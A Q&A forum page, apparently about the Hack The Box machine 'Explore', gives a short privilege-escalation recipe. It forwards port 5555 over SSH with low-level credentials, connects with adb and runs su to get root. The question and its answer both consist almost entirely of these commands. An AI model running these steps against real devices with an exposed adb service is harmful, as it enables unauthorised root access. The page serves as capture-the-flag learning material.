Remember
Register
Techbypass Let's Bypass
Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.
Learn and share your security findings and help others to secure their digital assets.
Questions
Unanswered
Tags
Users
Ask a Question
Need any help mail to
[email protected]
Activate
Privilege Escalation through ssh to root (adb) [Explore] by EtherNetIP-1
0
votes
You need lower level ssh credentials.
ssh user@<ip> -L 5555:localhost:5555 -p <EtherNetIP-1 port>
adb connect localhost:5555
adb shell
$su root
htb-flag
local-privilege-escalation
asked
Sep 5, 2021
by
exploitNeed
(
109
points)
Please
log in
or
register
to answer this question.
1
Answer
0
votes
adb connect localhost:5555
adb shell
$su root
answered
Jan 15, 2022
by
codeshikari
(
277
points)
Please
log in
or
register
to add a comment.
...